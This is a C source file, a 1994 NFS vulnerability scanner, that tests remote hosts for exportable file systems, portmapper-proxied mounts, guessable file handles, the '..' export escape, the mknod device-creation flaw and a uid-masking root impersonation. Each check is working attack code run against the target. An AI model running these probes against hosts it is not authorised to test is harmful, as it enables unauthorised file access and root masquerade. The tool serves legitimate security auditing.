/*
 * nfsbug.c
 *
 * Test hosts for well known NFS problems/bugs. Among these tests are:
 * find world wide exportable file systems, determine whether the
 * export list really works, determine whether we can mount file systems
 * through the portmapper, try to guess file handles, excercise the
 * mknod bug, and the uid masking bug.
 *
 * Author:
 *	Leendert van Doorn, april 1994
 *
 * TODO:
 *	- close sockets (?)
 */
#include <stdio.h>
#include <ctype.h>
#include <netdb.h>
#include <errno.h>
#include <rpc/rpc.h>
#ifdef SVR4
#include <rpc/clnt_soc.h>
#endif
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/sysmacros.h>
#include <sys/time.h>
#include <sys/vnode.h>
#include <sys/vfs.h>
#include <sys/sysmacros.h>
#ifdef SVR4
#include <sys/inode.h>
#else
#ifndef HPUX
#include <ufs/inode.h>
#endif
#endif

#include "mount.h"
#include "nfs_prot.h"

#ifndef TRUE
#define	TRUE	1
#define	FALSE	0
#endif

#ifdef SVR4
#define bzero(s,n)      memset((s), 0, (n))
#define bcopy(a,b,c)    memcpy(b,a,c)
#endif

/*
 * Something that is unlikely to appear in the
 * remote NFS server's name space.
 */
#define	VERY_UNLIKELY_FILE_NAME	"vUnLKeYFn"

/*
 * This random seed is the constant value that the
 * uninitialized variable ``timeval'' in fsirand contains.
 */
#define SUN4_RANDOM	(0 + 32)

/*
 * Disk device descriptor (major/minor)
 */
#define NMINORS		16
struct disk {
    int dsk_maj;		/* major disk device number */
    int dsk_min[NMINORS];	/* minor device table */
};

/*
 * Device descriptor
 */
#define NDISKS		4
struct device {
    long dev_random;		/* machine specific random seed */
    int dev_pid;		/* maximum pid to look at */
    struct disk dev_disks[NDISKS]; /* disk table */
};

/*
 * The device table
 */
#define	NDEVICES	(sizeof(device)/sizeof(struct device))
struct device device[] = {
    { SUN4_RANDOM, 2000,
	{
	    { 10,   /* /dev/xd[01][a-h] */
		{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 } },
	    { 7,    /* /dev/sd[01][a-h] */
		{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 } },
	    { 22,   /* /dev/id00[01][a-h] */
		{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 } },
	    { 3,    /* /dev/xy[01][a-h] */
		{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 } },
	}
    },
    { 0 }
};

/*
 * File system types, these correspond to entries in fsconf
 */
#define MOUNT_UFS       1
#define MOUNT_NFS       2
#define MOUNT_PC        3
#define MOUNT_LO        4
#define MOUNT_TFS       5
#define MOUNT_TMP       6

/*
 * This struct is only used to find the size of the data field in the
 * fhandle structure below.
 */
struct fhsize {
    fsid_t  f1;
    u_short f2;
    char    f3[4];
    u_short f4;
    char    f5[4];
};
#define NFS_FHMAXDATA   ((NFS_FHSIZE - sizeof (struct fhsize) + 8) / 2)

struct svcfh {
    fsid_t  fh_fsid;                /* filesystem id */
    u_short fh_len;                 /* file number length */
    char    fh_data[NFS_FHMAXDATA]; /* and data */
    u_short fh_xlen;                /* export file number length */
    char    fh_xdata[NFS_FHMAXDATA]; /* and data */
};

char *program;
int verbose = 0;
int mountcheck = TRUE;			/* simple export checks */
int portmapcheck = TRUE;		/* portmapper mount checks */
int handlecheck = TRUE;			/* handle guessing */
struct timeval timeout = { 30, 0 }; 	/* default time-out value */

void usage();
void nfsbug();
AUTH *create_unix_auth();
fhstatus *pmap_mnt();
char *nfs_error();
void makehandle(), printhandle();

main(argc, argv)
    int argc;
    char **argv;
{
    int i, opt;
    extern int optind;

    program = argv[0];
    while ((opt = getopt(argc, argv, "mphv")) != EOF) {
	switch (opt) {
	case 'm':
	    mountcheck = !mountcheck;
	    break;
	case 'p':
	    portmapcheck = !portmapcheck;
	    break;
	case 'h':
	    handlecheck = !handlecheck;
	    break;
	case 'v':
	    verbose++;
	    break;
	default:
	    usage();
	}
    }
    if (optind == argc)
	usage();

    for (i = optind; i < argc; i++)
	nfsbug(argv[i]);
}

void
usage()
{
    fprintf(stderr, "Usage: %s [-mphv] host ...\n", program);
    exit(1);
}

/*
 * Detect and report a number of well known NFS bugs
 */
void
nfsbug(host)
    char *host;
{
    struct sockaddr_in server_addr, addr;
    CLIENT *mntclient, *nfsclient;
    fhstatus *mountpoint;
    exports ex, *exp;
    attrstat *res;
    groups gr;
    int sock;
    char *proto;

    /* hosts can either be symbolic names or real IP addresses */
    if (isdigit(*host)) {
	server_addr.sin_addr.s_addr = inet_addr(host);
    } else {
	struct hostent *hp = gethostbyname(host);
	if (hp == NULL) {
	    fprintf(stderr, "%s: %s: unknown host\n", program, host);
	    return;
	}
	bcopy(hp->h_addr, (char *)&server_addr.sin_addr.s_addr, hp->h_length);
	host = hp->h_name;
    }
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = 0;

    /*
     * Talk to the remote mount daemon. First try a TCP stream before
     * using UDP. TCP deals large packets better than UDP, besides TCP
     * performs better over long haul networks :-)
     */
    sock = RPC_ANYSOCK;
    addr = server_addr; /* gets garbaged */
    if ((mntclient = clnttcp_create(&addr,
      MOUNTPROG, MOUNTVERS, &sock, 0, 0)) == (CLIENT *)0) {
	if (sock != RPC_ANYSOCK)
	   close(sock);
	sock = RPC_ANYSOCK;
	addr = server_addr; /* gets garbaged */
	if ((mntclient = clntudp_create(&addr,
	  MOUNTPROG, MOUNTVERS, timeout, &sock)) == (CLIENT *)0) {
	    clnt_pcreateerror("mount");
	    return;
	}
	proto = "UDP/IP";
    } else
	proto = "TCP/IP";

    clnt_control(mntclient, CLSET_TIMEOUT, &timeout);
    mntclient->cl_auth = create_unix_auth(0, 0);
    if (mntclient->cl_auth == NULL) {
	clnt_destroy(mntclient);
	return;
    }
    mntclient->cl_auth = create_unix_auth(-2, -2); /* well known uid, gid */
    if (mntclient->cl_auth == NULL) {
	clnt_destroy(mntclient);
	return;
    }
    if (verbose)
	printf("Connected to NFS mount daemon at %s using %s\n", host, proto);

    /*
     * Set up a connection with the NFS server. Again, first try TCP
     * and then UDP. I must admit, I haven't see that many NFS servers
     * that talk TCP.
     */
    sock = RPC_ANYSOCK;
    addr = server_addr; /* gets garbaged */
    if ((nfsclient = clnttcp_create(&addr,
      NFS_PROGRAM, NFS_VERSION, &sock, 0, 0)) == (CLIENT *)0) {
	if (sock != RPC_ANYSOCK)
	   close(sock);
	sock = RPC_ANYSOCK;
	addr = server_addr; /* gets garbaged */
	if ((nfsclient = clntudp_create(&addr,
	  NFS_PROGRAM, NFS_VERSION, timeout, &sock)) == (CLIENT *)0) {
	    clnt_pcreateerror("nfs clntudp_create");
	    clnt_destroy(mntclient);
	    return;
	}
	proto = "UDP/IP";
    } else
	proto = "TCP/IP";

    clnt_control(nfsclient, CLSET_TIMEOUT, &timeout);
    nfsclient->cl_auth = create_unix_auth(-2, -2); /* well known uid, gid */
    if (nfsclient->cl_auth == NULL) {
	clnt_destroy(nfsclient);
	clnt_destroy(mntclient);
	return;
    }
    if (verbose)
	printf("Connected to NFS server at %s using %s\n", host, proto);

    /*
     * Get the NFS export list. From this we extract the file systems
     * we try to mount.
     */
    if ((exp = mountproc_export_1(NULL, mntclient)) == NULL) {
	clnt_perror(mntclient, "mountproc_export");
	clnt_destroy(mntclient);
	return;
    }
    if (verbose > 2) {
	for (ex = *exp; ex != NULL; ex = ex->ex_next) {
	    printf("%-25s", ex->ex_dir);
	    if ((int)strlen(ex->ex_dir) >= 25)
		printf("\n                    ");
	    if ((gr = ex->ex_groups) == NULL)
		printf("everyone");
	    while (gr) {
		printf("%s ", gr->gr_name);
		gr = gr->gr_next;
	    }
	    putchar('\n');
	}
    }

    /*
     * 1. A number of problems exist here: Either the SA is terribly sloppy
     *    and didn't care to set the export list for a file system, the
     *    remote mount daemon has the old 256 bytes bug, or we're simply
     *    allowed to mount this file system. In either case we just try
     *	  to mount them and report whether we succeeded.
     */
    if (mountcheck) {
	for (ex = *exp; ex != NULL; ex = ex->ex_next) {
	    if (verbose > 1) printf("Trying %s ...\n", ex->ex_dir);
	    mountpoint = mountproc_mnt_1(&ex->ex_dir, mntclient);
	    if (mountpoint && mountpoint->fhs_status == NFS_OK) {
		res = nfsproc_getattr_2(mountpoint->fhstatus_u.fhs_fhandle,
			nfsclient);
		if (res && res->status == NFS_OK) {
		    printf("MOUNTABLE FILE SYSTEM %s:%s ", host, ex->ex_dir);
		    if (ex->ex_groups == NULL)
			printf("(no export restrictions)");
		    /* XXX find out whether we're in the export list */
		    putchar('\n');
		    exercise(mountpoint->fhstatus_u.fhs_fhandle, nfsclient,
			host, ex->ex_dir);
		} else if (verbose && res) {
		    printf("Handle for %s failed: %\n",
			ex->ex_dir, nfs_error(res->status));
		}
		mountproc_umnt_1(&ex->ex_dir, mntclient);
	    } else if (verbose && mountpoint)
		printf("Failed: %s: %s\n",
		    ex->ex_dir, nfs_error(mountpoint->fhs_status));
	}
    }

    /*
     * 2. Try to mount the file systems using the proxy RPC functionality
     *    provided by the portmapper. This problem occurs when the export
     *    list is reflexive, i.e. the host is contained in it.
     */
    if (portmapcheck) {
	for (ex = *exp; ex != NULL; ex = ex->ex_next) {
	    mountpoint = pmap_mnt(&ex->ex_dir, &server_addr);
	    if (mountpoint && mountpoint->fhs_status == NFS_OK) {
		res = nfsproc_getattr_2(mountpoint->fhstatus_u.fhs_fhandle,
			nfsclient);
		if (res && res->status == NFS_OK) {
		    printf("MOUNTABLE FILE SYSTEM %s:%s (via portmapper)\n",
			host, ex->ex_dir);
		    exercise(mountpoint->fhstatus_u.fhs_fhandle, nfsclient,
			host, ex->ex_dir);
		    /* no unmount */
		} else if (verbose && res) {
		    printf("Failed: %s: %s\n",
			ex->ex_dir, nfs_error(mountpoint->fhs_status));
		}
	    }
	}
    }

    /*
     * 3. Try to obtain remote file handles by guessing them. By far the
     *    most elaborate attack among this set, all though probably the
     *    less succesful. Because of a initialization problem in fsirand
     *    the inode generation number (the only real variable part in a
     *    file handle) gets initialized with a number between 0 and 30000,
     *    but in practice this is a number between 100..2000.
     *
     *    The machine/device major/device minor table is a three dimensional
     *	  matrix which we traverse. So far I haven't sorted out all the
     *	  proper values for different kind of machinery, only those which
     *	  we have around.
     */
    if (handlecheck) {
	register struct device *devp;
	register int frpid;
	register int dsk;
	register struct disk *dp;
	register int min, maj;
	fhandle handle;
	long gen;
	int n;

	for (devp = device; devp < &device[NDEVICES]; devp++) {
	    for (frpid = 0; frpid <= devp->dev_pid; frpid++) {
		/*
		 * We are looking for the generation number of i-node 2,
		 * the root i-node of a file system. This one is the easiest
		 * because it is the only special case in which the same i-node
		 * appears twice in the same handle (as root fs i-node and
		 * target i-node).
		 *
		 * The following magic is required to get the random generator
		 * machinery in the same state as the fsirand program might
		 * have been (given that it had pid at the time it ran).
		 */
#ifdef	HPUX
		srand(1);
		srand(frpid + devp->dev_random);
		for (n = frpid; n--; ) (void) rand();
		(void) rand(); /* inode 0 */
		(void) rand(); /* inode 1 */
		gen = rand();
#else
		srandom(1);
		srandom(frpid + devp->dev_random);
		for (n = frpid; n--; ) (void) random();
		(void) random(); /* inode 0 */
		(void) random(); /* inode 1 */
		gen = random();
#endif

		if (verbose && (frpid % 10) == 0)
		    printf("\tfsirand pid = %d, gen = %ld\n", frpid, gen);

		for (dsk = 0; dsk < NDISKS; dsk++) {
		    dp = &devp->dev_disks[dsk];
		    maj = dp->dsk_maj;
		    for (min = 0; min < NMINORS; min++) {
			makehandle(handle,
			    maj, dp->dsk_min[min], 2, gen, 2, gen);
			res = nfsproc_getattr_2(handle, nfsclient);
			if (res && res->status == NFS_OK) {
			    printf("GUESSABLE FILE HANDLE %s: ", host);
			    printhandle(handle);
			    printf("\n");
			    exercise(handle, nfsclient, host, "<unknown>");
			    break; /* got it for this minor device */
			}
		    }
		}
	    }
	}
    }

    auth_destroy(nfsclient->cl_auth);
    clnt_destroy(nfsclient);
    auth_destroy(mntclient->cl_auth);
    clnt_destroy(mntclient);
}

/*
 * Exercise the system for ``well known'' bugs
 */
exercise(handle, client, host, dir)
    fhandle *handle;
    CLIENT *client;
    char *host, *dir;
{
    /*
     * Of course when the uid bug works there's not much point
     * in testing the mknod bug as well.
     */
    if (uidbug(handle, client))
	printf("UID .. BUG: %s:%s\n", host, dir);
    if (mknodbug(handle, client))
	printf("MKNOD .. BUG: %s:%s\n", host, dir);
    if (cdbug(handle, client))
	printf("CHDIR .. BUG: %s:%s\n", host, dir);
}

/*
 * 4. The chdir ... bug. The original NFS implementation has the nice feature
 *    that cd .. on an exported file system (where the exported file is not
 *    the physical root) gets you the parent directory handle even if it was
 *    not exported. This is particularry worrisome on diskless clients where
 *    you have root access to your own NFS mounted root, but also to all the
 *    other physical directories on top of you (and down from there; e.g. the
 *    root file systems of other workstations).
 */
int
cdbug(handle, client)
    fhandle *handle;
    CLIENT *client;
{
    struct svcfh *fh = (struct svcfh *) handle;
    diropargs dargs;
    diropres *dres;
    attrstat *ares;

    /*
     * This only works for non physical UFS roots (i.e. the
     * inode number is not 2). I don't know about other file
     * systems.
     */
#ifdef	HPUX
    if (fh->fh_fsid[1] != MOUNT_UFS)
	return FALSE;
#else
    if (fh->fh_fsid.val[1] != MOUNT_UFS)
	return FALSE;
#endif
    if (*((ino_t *)&fh->fh_data[2]) != 2)
	return FALSE;

    /* get the file handle for ``..'' */
    dargs.name = "..";
    bcopy(handle, &dargs.dir, NFS_FHSIZE);
    dres = nfsproc_lookup_2(&dargs, client);
    if (!dres || dres->status != NFS_OK)
	return FALSE;

    /* make sure it is really a valid file handle */
    ares = nfsproc_getattr_2(&dres->diropres_u.diropres.file, client);
    return ares && ares->status == NFS_OK;
}

/*
 * 5. The mknod ... bug. Most NFS implementations allow you to turn
 *    create into a mknod, without any validation. This allows every
 *    user to make new devices. It doesn't take a genius to figure
 *    out what you can do with that.
 *
 *    CAVEAT: this code doesn't work if it cannot write the root directory.
 *    I'm not in the mood today to write code that traverses the tree until
 *    it finds a writable directory.
 */
int
mknodbug(handle, client)
    fhandle *handle;
    CLIENT *client;
{
    diropargs dargs;
    diropres *dres;
    attrstat *ares;
    createargs cargs;

    /*
     * Simply try to create a device in the root directory.
     * For this we need the root directory's uid and gid.
     */
    ares = nfsproc_getattr_2(handle, client);
    if (!ares || ares->status != NFS_OK)
	return FALSE;

    /*
     * Create character device 0,0
     */
    memcpy(&cargs.where.dir, handle, sizeof(*handle));
    cargs.where.name = VERY_UNLIKELY_FILE_NAME;
    cargs.attributes.mode = IFCHR;
    cargs.attributes.size = makedev(0, 0);

    if (ares->attrstat_u.attributes.uid)
	cargs.attributes.uid = ares->attrstat_u.attributes.uid;
    else
	cargs.attributes.uid = -2;

    if (ares->attrstat_u.attributes.gid)
	cargs.attributes.gid = ares->attrstat_u.attributes.gid;
    else
	cargs.attributes.gid = -2;

    dres = nfsproc_create_2(&cargs, client);
    if (!dres || dres->status != NFS_OK)
	return FALSE;

    /*
     * Apparently it worked, make sure it did ...
     */
    dargs.name = VERY_UNLIKELY_FILE_NAME;
    memcpy(&dargs.dir, handle, sizeof(*handle));
    dres = nfsproc_lookup_2(&dargs, client);
    if (!dres || dres->status != NFS_OK)
	return FALSE;

    /* get the file handle for VERY_UNLIKELY_FILE_NAME */
    dargs.name = VERY_UNLIKELY_FILE_NAME;
    bcopy(handle, &dargs.dir, NFS_FHSIZE);
    dres = nfsproc_lookup_2(&dargs, client);
    if (!dres || dres->status != NFS_OK)
	return FALSE;

    /* make sure it is really the device we created */
    ares = nfsproc_getattr_2(&dres->diropres_u.diropres.file, client);
    if (!ares || ares->status != NFS_OK)
	return FALSE;
    if ((ares->attrstat_u.attributes.mode & IFMT) != IFCHR)
	return FALSE;
    if (ares->attrstat_u.attributes.size != makedev(0, 0))
	return FALSE;

    /* it did, lets delete it */
    dargs.name = VERY_UNLIKELY_FILE_NAME;
    memcpy(&dargs.dir, handle, sizeof(*handle));
    (void) nfsproc_remove_2(&dargs, client);

    return TRUE;
}

/*
 * 6. The uid bug ... Because of some stupid masking problem with
 *    uids (i.e. uid is 16 bit, the value passed is 32 bits; the
 *    root check is performed on the 32 bit value BEFORE masking)
 *    it very easy to masquarade as root.
 */
int
uidbug(handle, client)
    fhandle *handle;
    CLIENT *client;
{
    diropargs dargs;
    diropres *dres;
    attrstat *ares;
    createargs cargs;
    AUTH *auth;
    int id;

    id = 0x00100000; /* this becomes 0 after masking it */
    auth = client->cl_auth;
    client->cl_auth = create_unix_auth(id, id);

    /*
     * Create a zero length file with uid 0, gid 0
     */
    cargs.where.name = VERY_UNLIKELY_FILE_NAME;
    memcpy(&cargs.where.dir, handle, sizeof(*handle));
    cargs.attributes.mode = 0666;
    cargs.attributes.uid = id;
    cargs.attributes.gid = id;
    cargs.attributes.size = -1;
    cargs.attributes.atime.seconds = -1;
    cargs.attributes.atime.useconds = -1;
    cargs.attributes.mtime.seconds = -1;
    cargs.attributes.mtime.useconds = -1;
    dres = nfsproc_create_2(&cargs, client);
    if (!dres || dres->status != NFS_OK) {
	auth_destroy(client->cl_auth);
	client->cl_auth = auth;
	return FALSE;
    }

    /*
     * Apparently it worked, make sure it did ...
     */
    dargs.name = VERY_UNLIKELY_FILE_NAME;
    memcpy(&dargs.dir, handle, sizeof(*handle));
    dres = nfsproc_lookup_2(&dargs, client);
    if (!dres || dres->status != NFS_OK) {
	auth_destroy(client->cl_auth);
	client->cl_auth = auth;
	return FALSE;
    }

    /* get the file handle for VERY_UNLIKELY_FILE_NAME */
    dargs.name = VERY_UNLIKELY_FILE_NAME;
    bcopy(handle, &dargs.dir, NFS_FHSIZE);
    dres = nfsproc_lookup_2(&dargs, client);
    if (!dres || dres->status != NFS_OK)
	return FALSE;

    /* make sure it is really root owned */
    ares = nfsproc_getattr_2(&dres->diropres_u.diropres.file, client);
    if (!ares || ares->status != NFS_OK)
	return FALSE;
    if (ares->attrstat_u.attributes.uid != 0)
	return FALSE;
    if (ares->attrstat_u.attributes.gid != 0)
	return FALSE;

    /* it did, lets delete it */
    dargs.name = VERY_UNLIKELY_FILE_NAME;
    memcpy(&dargs.dir, handle, sizeof(*handle));
    (void) nfsproc_remove_2(&dargs, client);

    auth_destroy(client->cl_auth);
    client->cl_auth = auth;
    return TRUE;
}

/*
 * Make a mount call via the port mapper
 */
fhstatus *
pmap_mnt(argp, addr)
    dirpath *argp;
    struct sockaddr_in *addr;
{
    enum clnt_stat stat;
    static fhstatus res;
    u_long port;

    bzero((char *)&res, sizeof(res));
    if ((stat = pmap_rmtcall(addr, MOUNTPROG, MOUNTVERS, MOUNTPROC_MNT,
      xdr_dirpath, argp, xdr_fhstatus, &res, timeout, &port)) != RPC_SUCCESS) {
	clnt_perrno(stat);
	return NULL;
    }
    return &res;
}

/*
 * Create a handle
 */
void
makehandle(handle, maj, min, inum, gen, rinum, rgen)
    struct svcfh *handle;
    int maj, min;
    long inum, gen;
    long rinum, rgen;
{
#ifdef	HPUX
    handle->fh_fsid[0] = makedev(maj, min);
    handle->fh_fsid[1] = MOUNT_UFS;
#else
    handle->fh_fsid.val[0] = makedev(maj, min);
    handle->fh_fsid.val[1] = MOUNT_UFS;
#endif

    handle->fh_len = 10;
    *((u_short *)&handle->fh_data[0]) = 0;	/* length */
    *((ino_t *)&handle->fh_data[2]) = inum;	/* inode */
    *((long *)&handle->fh_data[6]) = gen;	/* generation number */

    handle->fh_xlen = 10;
    *((u_short *)&handle->fh_xdata[0]) = 0;	/* length */
    *((ino_t *)&handle->fh_xdata[2]) = rinum;	/* inode */
    *((long *)&handle->fh_xdata[6]) = rgen;	/* generation number */
}

void
printhandle(handle)
    struct svcfh *handle;
{
    register char *p;
    register int i;

    /* fsid[0] -> major, minor device number */
#ifdef	HPUX
    printf("(%d,%d) ",
	major(handle->fh_fsid[0]), minor(handle->fh_fsid[0]));
#else
    printf("(%d,%d) ",
	major(handle->fh_fsid.val[0]), minor(handle->fh_fsid.val[0]));
#endif

    /* fsid[1] -> file system type */
#ifdef	HPUX
    switch (handle->fh_fsid[1]) {
#else
    switch (handle->fh_fsid.val[1]) {
#endif
    case MOUNT_UFS: printf("ufs "); break;
    case MOUNT_NFS: printf("nfs "); break;
    case MOUNT_PC:  printf("pcfs "); break;
    case MOUNT_LO:  printf("lofs "); break;
    case MOUNT_TFS: printf("tfs "); break;
    case MOUNT_TMP: printf("tmp "); break;
    default:	    printf("unknown "); break;
    }

    /* file number length, and data */
    printf("<%d,%ld,%ld> ",
	*((u_short *)&handle->fh_data[0]),
	*((ino_t *)&handle->fh_data[2]),
	*((long *)&handle->fh_data[6]));

    /* export file number length, and data */
    printf("<%d,%ld,%ld> ",
	*((u_short *)&handle->fh_xdata[0]),
	*((ino_t *)&handle->fh_xdata[2]),
	*((long *)&handle->fh_xdata[6]));

    /* print handle in hex-decimal format (as input for nfs) */
    printf("= <");
    for (i = 0, p = (char *)handle; i < sizeof(struct svcfh); i++, p++)
	printf(" %02x", *p & 0xFF);
    printf(" >\n");
}

/*
 * Returns an auth handle with parameters determined by doing lots of
 * syscalls.
 */
AUTH *
create_unix_auth(uid, gid)
    int uid, gid;
{
    char machname[MAX_MACHINE_NAME + 1];
    int gids[1];

    if (gethostname(machname, MAX_MACHINE_NAME) == -1) {
	fprintf(stderr, "create_unix_auth: cannot get hostname\n");
	return NULL;
    }
    machname[MAX_MACHINE_NAME] = 0;
    gids[0] = gid;
    return authunix_create(machname, uid, gid, 1, gids);
}

/*
 * NFS errors
 */
char *
nfs_error(stat)
    enum nfsstat stat;
{
    switch (stat) {
    case NFS_OK:
	return "No error";
    case NFSERR_PERM:
	return "Not owner";
    case NFSERR_NOENT:
	return "No such file or directory";
    case NFSERR_IO:
	return "I/O error";
    case NFSERR_NXIO:
	return "No such device or address";
    case NFSERR_ACCES:
	return "Permission denied";
    case NFSERR_EXIST:
	return "File exists";
    case NFSERR_NODEV:
	return "No such device";
    case NFSERR_NOTDIR:
	return "Not a directory";
    case NFSERR_ISDIR:
	return "Is a directory";
    case NFSERR_FBIG:
	return "File too large";
    case NFSERR_NOSPC:
	return "No space left on device";
    case NFSERR_ROFS:
	return "Read-only file system";
    case NFSERR_NAMETOOLONG:
	return "File name too long";
    case NFSERR_NOTEMPTY:
	return "Directory not empty";
    case NFSERR_DQUOT:
	return "Disc quota exceeded";
    case NFSERR_STALE:
	return "Stale NFS file handle";
    case NFSERR_WFLUSH:
	return "Write cache flushed";
    default:
	return "UKNOWN NFS ERROR";
    }
}
